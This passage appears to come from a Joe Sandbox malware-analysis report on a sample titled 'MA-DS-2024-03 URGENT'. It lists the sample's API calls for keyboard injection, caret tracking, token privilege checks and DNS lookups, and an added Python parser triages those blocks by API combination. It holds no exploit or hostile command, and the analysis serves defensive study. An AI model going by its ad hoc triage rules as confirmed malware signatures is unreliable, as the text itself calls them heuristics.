                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                        • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                        • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                        • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                        • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                        • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                        • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                        • __isleadbyte_l.LIBCMT ref: 00436229
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                        • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                        • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                        • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00484F02
                                                          • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                          • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                          • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                        • GetCaretPos.USER32(?), ref: 00484F13
                                                        • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                        • GetForegroundWindow.USER32 ref: 00484F54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                        • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                        • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                        • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • GetCursorPos.USER32(?), ref: 0048C4D2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                        • GetCursorPos.USER32(?), ref: 0048C534
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                        • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                        • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                        • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                        APIs
                                                          • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                          • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                          • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                          • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                          • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                        • _memcmp.LIBCMT ref: 004586C6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                        • HeapFree.KERNEL32(00000000), ref: 00458703
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                        • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                        • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                        • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
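The per-function blocks above (APIs, Memory Dump Source, Similarity) are regular enough to parse, and a responder usually wants to do exactly that: pull every function out of the report, keep its call list (including calls reached through the "Part of subcall function" lines), and rank functions by the API combinations they contain. The example below is added here and is not Joe Sandbox's code or the sample's; its input is a constructed excerpt that copies the keyboard-input block at ref 00460B27 and the token block at ref 004586A3 from this page, and its triage rules (synthetic keyboard input via SetKeyboardState + SendInput, caret tracking via AttachThreadInput + GetCaretPos as in the block at 00484F02, and integrity-level/privilege inspection via GetTokenInformation(TokenIntegrityLevel) + LookupPrivilegeValueW) are my own heuristics, not Joe Sandbox signatures. The parser also records whether a block's dump is "based on PE", which separates the on-disk image at 00400000 from the non-PE-backed region at 01670000 that other blocks on this page come from.

```python
"""Parse Joe Sandbox per-function API blocks and triage them by API combination (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed excerpt: two function blocks in the layout used on this page.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: KeyboardState$InputMessagePostSend
• Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
APIs
  • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
• HeapFree.KERNEL32(00000000), ref: 00458703
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
"""

CALL_RE = re.compile(r"^(?P<name>[^.(\s]+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>.*)\))?$")
REF_RE = re.compile(r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<addr>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
SOURCE_RE = re.compile(r"^Source File:\s*(?P<file>\S+),.*based on PE:\s*(?P<pe>true|false)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: Optional[str]          # call-site address, when the report prints one
    subcall_of: Optional[str]   # callee address when the call is reached via a listed subcall

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    source_file: Optional[str] = None
    based_on_pe: Optional[bool] = None  # false = dump not backed by a PE image (unpacked/injected)
    meta: Dict[str, str] = field(default_factory=dict)  # "API ID", "Instruction Fuzzy Hash", ...

def split_args(text: str) -> Tuple[str, ...]:
    """Split on top-level commas only, so '00000003(TokenIntegrityLevel)' stays whole."""
    out, cur, depth = [], "", 0
    for ch in text:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out.append(cur); cur = ""
        else:
            cur += ch
    return tuple(out + [cur]) if text else ()

def parse_call(item: str) -> Optional[ApiCall]:
    subcall_of = ref = None
    if m := SUBCALL_RE.match(item):
        subcall_of, item = m.group("addr"), m.group("rest")
    if m := REF_RE.search(item):
        ref, item = m.group("ref"), item[:m.start()]
    if not (m := CALL_RE.match(item.strip())):
        return None
    args = split_args(m.group("args")) if m.group("args") is not None else ()
    return ApiCall(m.group("name"), m.group("module"), args, ref, subcall_of)

def parse_report(text: str) -> List[FunctionBlock]:
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every "APIs" heading opens a new function block
            cur = FunctionBlock(); blocks.append(cur); section = line
        elif line in ("Memory Dump Source", "Similarity"):
            section = line
        elif cur is not None and line.startswith("•"):
            item = line[1:].strip()
            if section == "APIs" and (call := parse_call(item)):
                cur.calls.append(call)
            elif section == "Memory Dump Source" and (m := SOURCE_RE.match(item)):
                cur.source_file, cur.based_on_pe = m.group("file"), m.group("pe") == "true"
            elif section == "Similarity" and ":" in item:
                key, val = item.split(":", 1)
                cur.meta[key.strip()] = val.strip()
    return blocks

# Constructed triage rules: a rule fires when every listed API is present in one function.
RULES = {
    "synthetic keyboard input": {"SetKeyboardState", "SendInput"},
    "foreign-window caret tracking": {"AttachThreadInput", "GetCaretPos"},
    "token integrity / privilege inspection": {"GetTokenInformation", "LookupPrivilegeValueW"},
}

def triage(block: FunctionBlock) -> List[str]:
    names = {c.name for c in block.calls}  # own calls and calls reachable via listed subcalls
    hits = [rule for rule, needed in RULES.items() if needed <= names]
    if any("TokenIntegrityLevel" in a for c in block.calls for a in c.args):
        hits.append("queries TokenIntegrityLevel")
    return hits
```

Two caveats when reading the hits. First, a rule match says the capability exists in the code of that dump, not that the sample exercised it during the run; the behavioural evidence is in the signature list, not here. Second, every block on this page with these routines sits in the PE-backed image at 00400000, and the report classifies the sample as a compiled AutoIt script, so these hits are consistent with the interpreter's own built-ins rather than with script logic; functions whose dump has `based_on_pe == False` deserve a look before these do.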
                                                        APIs
                                                        • __setmode.LIBCMT ref: 004209AE
                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                        • _fprintf.LIBCMT ref: 004209E5
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                          • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                        • __setmode.LIBCMT ref: 00420A1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                        • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                        • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                        • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                        APIs
                                                        • _free.LIBCMT ref: 00435101
                                                          • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                          • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                          • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                        • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                        • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                        • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                        APIs
                                                        • _memset.LIBCMT ref: 004044CF
                                                          • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                          • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                          • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                        • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                        • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                        • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                        APIs
                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                        • _memmove.LIBCMT ref: 004763D1
                                                        • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                        • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                        • Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                        • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                        • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                        • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                        • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                        • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                        • GetCursorPos.USER32(?), ref: 0043B605
                                                        • ScreenToClient.USER32(?,?), ref: 0043B610
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
